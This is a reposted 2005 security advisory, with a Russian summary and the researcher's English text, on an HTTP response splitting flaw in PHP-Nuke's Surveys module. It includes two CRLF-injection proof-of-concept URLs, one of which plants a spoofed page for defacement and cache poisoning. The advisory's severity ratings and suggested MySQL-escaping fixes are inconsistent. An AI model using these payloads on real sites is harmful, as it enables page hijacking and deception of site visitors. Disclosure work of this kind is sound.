HTTP response splitting атака в модуле Surveys в PHP-Nuke
HTTP response splitting атака в модуле Surveys в PHP-Nuke
Программа: PHP-Nuke 7.6 более ранние версии Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю произвести HTTP response splitting атаку. Уязвимость существует из-за недостаточной проверки входных данных в переменной forward в модуле Surveys. Удаленный пользователь может использовать эту уязвимость, чтобы подменить содержимое страниц целевого сервера, отравить кеш прокси сервера, произвести XSS нападение. URL производителя: www.phpnuke.org Решение: Способов устранения уязвимости не существует в настоящее время. ================================================== ============ Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah Severity: High Title: Http Response Splitting Vulnerability In PHP-NUKE 7.6 and below Date: 15/04/2005 Vendor: Php-Nuke Vendor Website: http://www.phpnuke.org Summary: There are, http response splitting vulnerability in php-nuke 7.6 and below. Proof of Concept Exploits: MORE DETAILS OF THIS SORT OF BUG CAN BE FOUND AT www.digitalparadox.org/papers.ah A simple POC can be as follows, http://localhost/modules.php?name=S...%3Chtml%3EHELLO I AM VULNERABLE TO HTTP RESPONSE SPLITTING%3C/html%3E&voteID=1&voteID=2&voteID=3&voteID=4&voteID=5 A more serious version involving Cross user defacement, cache poisoning and page hijacking can be, http://localhost/modules.php?name=Surveys&pollID=1&forwarder=%0d%0a%0d%0a%3Chtml%3E<title>This is a spoofed site </title> <body bgcolor=black><font size=10 color=blue> Welcome to my PHP Nuke Website, This is a spoofed page that you are seeing and can be used for great evils details about which can be read in http://www.digitalparadox.org/papers.ah Http Response Splitting by Diabolic Crab. </center> Feel free to contact me about this vulnerablitiy at dcrab {at} hackerscenter [dot] com<font color=black>%3C/html%3E&voteID=1&voteID=2&voteID=3&voteID=4&voteID=5 Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems. Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author: These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php. Diabolic Crab Web Security, Research & Development dP Security email: dcrab@digitalparadox.org website: http://www.digitalparadox.org This message is confidential. It may also contain information that is privileged or otherwise legally exempt from disclosure. If you have received it by mistake please let us know by e-mail immediately and delete it from your system; should also not copy the message nor disclose its contents to anyone. Many thanks. |
Часовой пояс GMT +4, время: 03:30. |
Copyright © 2005 by Soniks